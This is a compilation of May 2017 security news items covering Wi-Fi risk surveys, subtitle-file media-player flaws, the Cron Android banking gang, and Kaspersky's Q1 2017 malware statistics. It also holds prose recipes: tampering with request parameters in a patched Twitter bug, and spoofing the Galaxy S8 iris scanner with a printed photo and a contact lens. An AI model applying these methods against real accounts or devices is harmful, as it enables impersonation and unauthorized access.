Less than a third of companies ban the use of public Wi-Fi at all times, while a further 37% ban their use 'sometimes'. More surprising, however, is the regional difference: 44% of UK organizations do not, and do not plan to introduce a ban; but only 10% of US companies are similar. Eight percent of UK companies have no concern over mobile security, while only 1% of US companies have no concerns.

Coffee shops are unsurprisingly a major cause of concern. "Wherever there is an unsecured public Wi-Fi network," notes the report, "there is the threat of attack. However, coffee shops are seen as the most dangerous public Wi-Fi venue of all." In all regions surveyed, 42% of respondents cited coffee shops as their major concern over public wi-Fi. "Cafes and coffee shops are everywhere and offer both convenience and comfort for mobile workers, who flock to these venues for the free high speed internet as much as for the coffee," comments Raghu Konka, vice president of engineering at iPass. "However, cafes invariably have lax security standards, meaning that anyone using these networks will be potentially vulnerable."

Cafes are followed by airports (30%) and hotels (16%) as the locations giving most concern over public Wi-Fi.

Man-in-the-middle (MitM) attacks are considered the greatest threat, cited by 69% of respondents. This is followed by lack of encryption (63%), hotspot spoofing (58%), and unpatched devices (55%).

The greatest risk, however, comes not from mid-level or even junior staff -- it is the CEO and other C-level executives. "The grim reality," explains Konka, "is that C-level executives are by far at the greatest risk of being hacked outside of the office. They are not your typical 9-5 office worker. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker."

The respondents agreed. Overall, 40% of respondents named the C-Suite. It was as low as 29% in the UK (possibly because there are fewer C-level executives), and as high as 49% in Germany. It was 40% in the US. Senior management came in as presenting the second most serious threat, at 34% overall. Not surprisingly, it was higher in the UK at 42%; and lower in the US at 26%.

The simple reality is that mobile working is an essential part of modern business despite security concerns about it. In many cases, the survey suggests that total bans on public Wi-Fi are increasingly adopted. "Sadly, in response to this growing threat, the majority of organizations are choosing to ban first and think later," comments Konka. "They ignore the fact that, in an increasingly mobile world, there are actually far more opportunities than threats. Rather than give in to security threats and enforce bans that can be detrimental or even unenforceable, businesses must instead ensure that their mobile workers have the tools to get online and work securely at all times."


Media Players Expose Millions of Systems to Subtitle Attacks

24.5.2017 securityweek Hacking
Malicious actors could hijack millions of systems using specially crafted subtitle files that exploit vulnerabilities in some of the most popular media players, security firm Check Point warned on Tuesday.

According to experts, attackers can take complete control of a device simply by getting the targeted user to open a malicious subtitle file in one of the vulnerable media players. In the case of applications that automatically obtain subtitles from the Internet, it may be possible to conduct attacks without any user interaction.

Check Point’s analysis has focused on four popular media players, but researchers believe other applications are likely affected as well. The players confirmed to be vulnerable are VLC, the open-source home theater software Kodi (formerly known as XBMC), the video streaming app Stremio, and Popcorn Time, which streams movies and TV shows directly from torrents.

Experts pointed out that the potential number of victims for these subtitle attacks is very high considering that the latest version of VLC has been downloaded 170 million times, and Kodi reportedly has nearly 40 million unique users each month.

The developers of these media players have released patches, but some issues are still under investigation and Check Point has decided not to make public any technical details.

According to the security firm, hackers can use specially crafted subtitle files to execute arbitrary code, which can allow them to take complete control of the system.

“The attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,” Check Point’s research team said in a blog post. “The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.”

A video published by Check Point shows how the attack works:

While in some cases the targeted user needs to be convinced to open the malicious file with an affected player, researchers warned that attackers could also manipulate the ranking algorithm of subtitle websites to ensure that applications designed to automatically load subtitles would pick their file. By ensuring that their subtitle has a high ranking, attackers also increase the chances of users manually loading the malicious files.


New Product Allows Easy Addition of Multi-Factor Authentication to Any Application

24.5.2017 securityweek Safety
New Multi-factor Authentication Offering Seeks Balance Between Strong Security and Ease of Use

The correct balance between strong security and excessive control is difficult. Without strong security, such as multi-factor authentication (MFA), organizations will be breached. With excessive control (such as MFA always and everywhere), business will be impeded, employees will be disgruntled, and controls will be bypassed. A new behavioral authentication product announced today by security firm Preempt allows optional MFA, based on user behavior, on any application.

Preempt's new "Any App" offering seeks to solve the growing concern over the insider threat by allowing policy to dictate whether user access to any application should be challenged by multi-factor authentication requirements, or simply allowed. This increases security without increasing unnecessary impediment to business.

The insider threat is insidious. It can come from innocent users, 'malicious' users motivated by curiosity or worse, or hackers inside the network with stolen credentials. While modern network analytics can detect 'unusual' behavior, they cannot automatically distinguish between simple unusual and malicious unusual. The result is a large number of alerts that need to be investigated but are often false positives.

Preempt's Any App takes a different approach by imposing strong security in the form of multi-factor authentication requirements on any specified application whenever -- but only if -- 'unusual' user behavior is detected. This is an advance on the more usual and common approach of applying MFA to web applications only.

"Security teams want to better protect their organization and application from threats and breaches by adding policies that require users to validate their identity via authentication techniques before accessing corporate applications," explains Ajit Sancheti, co-founder and CEO of Preempt. But while adding MFA to web applications is relatively simple, protecting on-premises applications is more complex. Integrating secure authentication into each application requires significant resources, which typically leads to the majority of internal applications not being protected by MFA.

Any App, he continues, "removes the need for application customization, and turns the task of adding MFA support to applications into a simple matter of defining policy, which saves both time and money, while also protecting the organization from security breaches."

Any App works at the network layer for both Windows and Linux environments, and acts as an LDAP or Kerberos proxy. When a user first seeks access to an application, the application will attempt to verify the user. Any App proxies this request, and based on security policy can either allow access or require MFA.

If policy requires additional authentication, the organization's MFA solution is automatically triggered. Since Any App is vendor neutral, the MFA can come from the existing deployment of a range of vendors such as Duo, OKTA, and SecureAuth.

The behavioral policy engine within Any App allows the security team to define the conditions necessary to invoke MFA. For example, if the access request comes from an unmanaged device, or if the user is connecting to a new asset or from a new location or new device. This allows the security team to automatically apply more stringent controls without requiring individual alert analysis.

Any App attempts to allow the security team to define and control the balance between strong security and ease of use. It reduces the cost of strong security while activating it only where policy decides it is necessary.


Twitter Bug Allowed Publishing Tweets From Any Account

24.5.2017 securityweek Social
A bug in the Twitter social network allowed an attacker to post tweets as a different user, without having access to the victim’s account.

Discovered by a security researcher going by the name of kedrisec, the issue was reported to Twitter on February 26 and was resolved two days later. The vulnerability was assessed High severity and the reporter received a $7,560 bounty for it.

The issue resided in the handling of Twitter Ads Studio requests, Twitter explains: “By sharing media with a victim user and then modifying the post request with the victim's account ID the media in question would be posted from the victim's account.”

No evidence of the flaw being exploited in the wild has been found so far, with the reporter being the only one to have leveraged the vulnerability, Twitter says.

In their write-up, the researcher explains that the issue leverages Twitter’s ads service, which “has media-library with the possibility to upload media-files (video, pictures, GIF-animation).” The service also offers the option to review media-files uploaded before and which were used when a tweet was published.

The library is located at https://ads.twitter.com/accounts/*id_of_user_account*/media and allows the user not only to view the media file, but also to tweet the file or share it with other users. The function for tweeting has access to account_id, owner_id (image owner), user_id (the user the tweet will be published to), and media_key (id of the media-file that is being published).

Attempting to replace the owner_id and user_id in intercepted GET request and JSON or in POST returned errors. The POST error, however, revealed that the service doesn’t accept the user with the replaced owner_id as the owner of the media file.

The researcher then attempted to modify not only owner_id and user_id, but media_key in POST as well, which resulted in a successful attempt of tweet publication. While this allowed the researcher to publish as any user, it did show a limitation: they could publish only if the user had media-files uploaded and also had to know the media_key of the file, which is almost impossible to get, as it contains 18 digits.

However, if the attacker shared a media-file with the targeted user (meaning the attacker already knows the media_key), the service would consider the victim being the owner of the file, thus allowing the attacker to successfully impersonate the victim when tweeting.

In short, the attack would include the following steps: uploading a file, sharing the file with the targeted user, intercept the query for tweet publication and change in POST the owner_id and user_id (the media_key, which is already known to the attack, doesn’t change).


Beware! Subtitle Files Can Hack Your Computer While You're Enjoying Movies
24.5.2017 thehackernews Hacking
Do you watch movies with subtitles?
Just last night, I wanted to watch a French movie, so I searched for English subtitles and downloaded it to my computer.
Though that film was excellent, this morning a new research from Checkpoint scared me.
I was unaware that a little subtitle file could hand over full control of my computer to hackers, while I was enjoying the movie.
Yes, you heard that right.
A team of researchers at Check Point has discovered vulnerabilities in four of the most popular media player applications, which can be exploited by hackers to hijack "any type of device via vulnerabilities; whether it is a PC, a smart TV, or a mobile device" with malicious codes inserted into the subtitle files.
"We have now discovered malicious subtitles could be created and delivered to millions of devices automatically, bypassing security software and giving the attacker full control of the infected device and the data it holds," he added.
These four vulnerable media players (mentioned below) have been downloaded more than 220 million times:
VLC — Popular VideoLAN Media Player
Kodi (XBMC) — Open-Source Media Software
Popcorn Time — Software to watch Movies and TV shows instantly
Stremio — Video Streaming App for Videos, Movies, TV series and TV channels
The vulnerabilities reside in the way various media players process subtitle files and if exploited successfully, could put hundreds of millions of users at risk of getting hacked.
As soon as the media player parses those malicious subtitle files before displaying the actual subtitles on your screen, the hackers are granted full control of your computer or Smart TV on which you ran those files.
Proof-of-Concept Video

In the above video, the researchers demonstrated that how a maliciously crafted subtitle file for a movie added to Popcorn Time media player can hijack a Windows PC. On the right-hand side of the screen, an attacker, running Kali Linux, gained the remote access of the system as soon as the victim added the subtitle file.
Since text-based subtitles for movies and TV shows are created by writers and then uploaded to Internet stores, like OpenSubtitles and SubDB, hackers could also craft malicious text files for same TV shows and movies.
"Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction," CheckPoint researchers said.

The researchers believe that similar security vulnerabilities also exist in other streaming media players.
How to Protect Your Computer from Hackers?
Check Point has already informed the developers of VLC, Kodi, Popcorn Time and Stremio applications about the recently discovered vulnerabilities.
"To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point," the researchers said.
All of them have patched the flaws, with Stremio and VLC releasing the patched versions of their software: Stremi 4.0 and VLC 2.2.5 that has been out for two weeks.
However, Kodi developer Martijn Kaijser said the official version 17.2 release would arrive later this week, while users could get a fixed version online. A patch for Popcorn Time is also available online.
So, users are advised to update their media player as soon as possible.


Cyber Crime Gang Arrested for Infecting Over 1 Million Phones with Banking Trojan
24.5.2017 thehackernews Virus
The Russian Interior Ministry announced on Monday the arrest of 20 individuals from a major cybercriminal gang that had stolen nearly $900,000 from bank accounts after infecting over one million Android smartphones with a mobile Trojan called "CronBot."
Russian Interior Ministry representative Rina Wolf said the arrests were part of a joint effort with Russian IT security firm Group-IB that assisted the massive investigation.
The collaboration resulted in the arrest of 16 members of the Cron group in November 2016, while the last active members were apprehended in April 2017, all living in the Russian regions of Ivanovo, Moscow, Rostov, Chelyabinsk, and Yaroslavl and the Republic of Mari El.
Targeted Over 1 Million Phones — How They Did It?

Group-IB first learned of the Cron malware gang in March 2015, when the criminal gang was distributing the Cron Bot malware disguised as Viber and Google Play apps.
The Cron malware gang abused the popularity of SMS-banking services and distributed the malware onto victims' Android devices by setting up apps designed to mimic banks' official apps.
The gang even inserted the malware into fake mobile apps for popular pornography websites, such as PornHub.
Once victims downloaded and installed these fake apps on their devices, the apps added itself to the auto-start and the malware hidden inside them granted the hackers the ability to phish victims’ banking credentials and intercept SMS messages containing confirmation codes sent by the bank to verify the transactions.
"After installation, the program added itself to the auto-start and could send SMS messages to the phone numbers indicated by the criminals, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank," writes Group-IB.
"The approach was rather simple: after a victim’s phone got infected, the Trojan could automatically transfer money from the user’s bank account to accounts controlled by the intruders. To successfully withdraw stolen money, the hackers opened more than 6 thousand bank accounts."
The gang usually sent text messages to the banks initiating a transfer of up to $120 to one of their 6,000 bank accounts the group set up to receive the fraudulent payments.
The malware would then intercept the two-step verification codes sent by the bank to confirm the transaction and block the victims from receiving a message notifying them about the transaction.
Cyberthieves Stole $900,000 in the Russia Alone

On April 1, 2016, the gang advertised its Android banking Trojan, dubbed "Cron Bot," on a Russian-speaking forum, giving the Group-IB researchers and Russian authorities a clue to their investigation into the group's operation.
According to the security firm, the group stole approximately 8,000 Rubles (nearly $100) from a victim on an average, fetching a total amount of 50 Million Rubles (almost $900,000) from more than one million victims, with 3,500 unique Android devices infected per day.
After targeting customers of the Bank in Russia, where they were living in, the Cron gang planned to expand its operation by targeting customers of banks in various countries, including the US, the UK, Germany, France, Turkey, Singapore, and Australia.
In June 2016, the gang rented a piece of malware called "Tiny.z" for $2,000 per month, designed to attack customers of Russian banks as well as international banks in Britain, Germany, France, the United States and Turkey, among other countries.
Despite operating only in Russia before their arrest, the gang members had already developed web injections for several of French banks including Credit Agricole, Assurance Banque, BNP Paribas, Banque Populaire, Boursorama, Caisse d'Epargne, Societe Generale and LCL, Group-IB said.
However, before the gang could launch attacks on French banks, the authorities managed to disrupt their operations by making several arrests, including the gang's founder, a 30-year-old resident of Ivanovo, Moscow.
During the raids, the authorities seized computer equipments, bank cards, and SIM cards associated with the criminal gang.


Police dismantled the Cron gang that targeted Bank Accounts via Android Malware
24.5.2017 securityaffairs  Android

Russian authorities with the support of the security firm Group-IB dismantled the operations of the Cron gang that infected more than 1 million smartphones.
Russian authorities dismantled a major criminal ring that was targeting bank accounts by using an Android malware, dubbed ‘Cron,’ that compromised more than one million Android smartphones.

According to the Russian Interior Ministry, the criminal organization had stolen nearly $900,000 from bank accounts.

Law enforcement, assisted by the cyber security firm Group-IB have identified 25 members of the organization led by a 30-year-old living in the city of Ivanovo.

16 members of the gang were detained in November 2016, while the last active member was arrested in April.

The Cron Trojan was first spotted in March 2015, when the crime gang had been distributing the malware disguised as Viber and Google Play apps.

Early 2016, investigators discovered that an Android banking Trojan dubbed ‘Cron Bot’ was offered for rent in the criminal underground. According to the experts from the IBM X-Force the Cron Bot had been leased for between $4,000 and $7,000, depending on the configuration chosen by the buyer.

Cron gang malware

The Cron gang used spam SMS messages to spread the malware to individuals in Russia, the attackers used a very effective social engineering technique. The SMS messages informed recipients that their ads or photos had been shared on a website, and included links to a site that tricked victims into downloading and executing the malicious code.

“Spam SMS messages with a link to a website infected with the banking Trojan. The message was of the following form: “Your ad is posted on the website ….”, or “your photos are posted here.” After the user visits the compromised website, the malware will be downloaded on the device, tricking the victim to install it.” reads the report published by Group-IB.

“The victim could install the malicious program on the phone by downloading fake applications masked as legitimate ones. The Trojan is distributed under the guise of such applications as Navitel; Framaroot; Pornhub; Avito.“

Once the Cron Trojan infected a device, the malware could send SMS messages to any phone number, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank. Using the features the malware can intercept 2FA messages sent to the users to authorize fraudulent transactions conducted by crooks.

The Cron gang earned approximately $900 000 USD (50 million rubles) with its activity.

“Every day Cron malware attempted to steal money from 50-60 clients of different banks. An average theft was about 8,000 rubles ($100). According to crime investigators, the total damage from Cron’s activity amounted to approximately $800 000 USD (50 million rubles). ” continues the report.

The investigators discovered the Cron Gang decided to extend its activity to other countries, they rented the Tiny.z banking Trojan for $2,000 per month.

Experts speculate the hackers had been planning on targeting France banking users because the Cron gang developed web injections for several of French banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d’Epargne, Societe Generale and LCL.


Hackers demonstrated that it is too easy to bypass the Samsung S8 iris scanner.
24.5.2017 securityaffairs  Hacking

Hackers demonstrated that it is very easy to bypass the Samsung S8 iris scanner by using a camera, a printer, and a contact lens.
Security experts have once against bypassed mobile Biometric system installed on a mobile device, the Samsung S8 model.

Hackers used a camera, a printer and a contact lens to bypass the iris scanner installed on the Samsung S8.

Some smartphones use facial recognition technology for user authentication, researchers from the Chaos Computer Club (CCC) demonstrated that is possible to easily bypass the scanner’s protections and unlock the device.

“We’ve had iris scanners that could be bypassed using a simple print-out,” Linus Neumann, one of the experts who devised the hacking technique, told Motherboard in a Twitter direct message.

“The Samsung Galaxy S8 is the first flagship smartphone with iris recognition. The manufacturer of the biometric solution is the company Princeton Identity Inc. The system promises secure individual user authentication by using the unique pattern of the human iris.” reads the post published by the Chaos Computer Clubs.

“A new test conducted by CCC hackers shows that this promise cannot be kept: With a simple to make dummy-eye the phone can be fooled into believing that it sees the eye of the legitimate owner.

The researchers emulate the thief capturing iris pictures with a digital camera in night-shot mode or the infrared filter removed. Then, to give the image some depth, the experts placed a contact lens on top of the printed picture.

“The easiest way for a thief to capture iris pictures is with a digital camera in night-shot mode or the infrared filter removed. In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable.” continues the post. “Starbug was able to demonstrate that a good digital camera with 200mm-lens at a distance of up to five meters is sufficient to capture suitably good pictures to fool iris recognition systems.”

The researchers explained that they quickly found the way to devise the facial recognition system implemented by Samsung, in just one day of experiments that bypassed it.

“About a day of experimenting until the idea came up do use a contact lens. Then, a little charade of printers until it turned out that the Samsung printer provided the most reliable prints,” Neumann told Motherboard.

Samsung S8 home-screen-840x473.jpg

This isn’t the first time experts at CCC bypassed biometric locks for smartphones, the first proof of concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 to hack an iPhone 5s, in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass Fingerprint biometrics using only a few photographs.

In March YouTube vlogger iDeviceHelp posted a video on his channel, in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus getting the device owner’s picture from Facebook and presenting the image to the locked phone.

Ler’s wait for the Samsung reply.


IT threat evolution Q1 2017. Statistics
23.5.2017 Kaspersky Analysis

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,333,605 malicious installation packages;
32,038 mobile banker Trojans (installation packages);
218,625 mobile ransomware Trojans (installation packages).
Mobile threats

Q1 events

The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.

IT threat evolution Q1 2017. Statistics

Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, Backdoor.Win32.Htbot.bs was downloaded.

IT threat evolution Q1 2017. Statistics

The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.

IT threat evolution Q1 2017. Statistics

Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type

IT threat evolution Q1 2017. Statistics

Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the most affected was Trojan-Ransom – its share increased from 4.64% to 16.42%, that is 3.5 times. The most rapid growth in the number of installation packages was demonstrated by the Trojan-Ransom.AndroidOS.Congur family, which will be described below.

Second came Trojan-Spyware: in terms of the growth rate, its proportion reached 10.27% (+1.83%). This was caused by the increase in the number malicious programs belonging to the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families designed to steal SMS.

In the first quarter, the biggest decline was demonstrated by Adware (7.32%) and Trojan-Dropper (6.99%) – their shares decreased by 4.99% and 4.48% respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 of 2017, 14 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20.Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

Name % of attacked users *
1 DangerousObject.Multi.Generic 70.09
2 Trojan.AndroidOS.Hiddad.an 9.35
3 Trojan.AndroidOS.Boogr.gsh 4.51
4 Backdoor.AndroidOS.Ztorg.c 4.18
5 Trojan.AndroidOS.Sivu.c 4.00
6 Backdoor.AndroidOS.Ztorg.a 3.98
7 Trojan.AndroidOS.Hiddad.v 3.89
8 Trojan-Dropper.AndroidOS.Hqwar.i 3.83
9 Trojan.AndroidOS.Hiddad.pac 2.98
10 Trojan.AndroidOS.Triada.pac 2.90
11 Trojan.AndroidOS.Iop.c 2.60
12 Trojan-Banker.AndroidOS.Svpeng.q 2.49
13 Trojan.AndroidOS.Ztorg.ag 2.34
14 Trojan.AndroidOS.Ztorg.aa 2.03
15 Trojan.AndroidOS.Agent.eb 1.81
16 Trojan.AndroidOS.Agent.bw 1.79
17 Trojan.AndroidOS.Loki.d 1,76
18 Trojan.AndroidOS.Ztorg.ak 1.67
19 Trojan-Downloader.AndroidOS.Agent.bf 1.59
20 Trojan-Dropper.AndroidOS.Agent.cv 1.54
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

Trojan.AndroidOS.Hiddad.an (9.35%) was second. This piece of malware imitates different popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to combat its removal. The main purpose of Trojan.AndroidOS.Hiddad.an is aggressive display of adverts, its main “audience” is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). Such verdict is issued for files recognized as malicious by our system based on machine learning. Despite the fact that this system can detect any types of malware, in Q1 2017, the most popular were advertising Trojans which used superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for the Trojans protected by a certain packer/obfuscator. In most cases, this name hides the representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan in Q1 of 2017.

Trojan.AndroidOS.Agent.bw was sixteenth in the rating (1.79%). This Trojan, targeting primarily people in India (more than 92% of attacked users), just like Trojan.AndroidOS.Hiddad.an imitates popular programs and games, and once run, downloads and installs various applications from the fraudsters’ server.

The geography of mobile threats

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Iran 47.35
2 Bangladesh 36.25
3 Indonesia 32.97
4 China 32.47
5 Nepal 29.90
6 India 29.09
7 Algeria 28.64
8 Philippines 27.98
9 Nigeria 27.81
10 Ghana 25.85
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, the US (6.9%) 69th line, Italy (7.1%) 66th, Germany (6.2%) 72nd, Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the countries of the Top 20, the same mobile objects – adware – are detected, and first of all, the representatives of the AdWare.AndroidOS.Ewind family as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.

IT threat evolution Q1 2017. Statistics

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by Trojans Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most of attacked users were in Russia.

malware_q1_17_ru_7

Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 1.64
2 Australia 1.14
3 Turkey 0.81
4 Uzbekistan 0.61
5 Tajikistan 0.48
6 Moldova 0.43
7 Ukraine 0.41
8 Kazakhstan 0.37
9 Kyrgyzstan 0.32
10 Singapore 0.26
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold – from 3.12% to 1.64%. At the same time, Russia remained the TOP 20leader.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218, 625 mobile Trojan-Ransomware installation packages which is 3.5 times more than in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, we saw the increase in the number of mobile ransomware installation packages caused by the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the same year, the activity of this family fell, which affected the number of detected installation packages. The growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family – more than 86% of detected mobile ransomware installation packages belonged to this family. Usually, the representatives of Congur have very simple functionality – they change the system password (PIN), or install it if no password was installed earlier, thus making it impossible to use the device, and then ask that user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 counties attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked**
1 USA 1.23
2 Uzbekistan 0.65
3 Canada 0.56
4 Kazakhstan 0.54
5 Italy 0.44
6 Germany 0.37
7 Korea 0.35
8 Denmark 0.30
9 United Kingdom 0.29
10 Spain 0.28
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most of mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks operation of a device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return of the degenerated exploit kit Neutrino, which had departed the cybercriminal market in the third quarter. Following Magnitude, Neutrino is changing the distribution format and abandoning wide-scale campaigns to become a “private” exploit kit. Several new players – Nebula, Terror, and other –tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to naught. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily caused by weak exploit kit environment, as well as the decrease in the effectiveness of exploits in general. Adobe Flash remained the only platform that demonstrated growth: although no new vulnerabilities for it had been discovered, the number of attacked users grew by 20%. The biggest decrease fell on exploits for different browsers – only 44% of attacks targeted them (against 54% in the previous quarter).

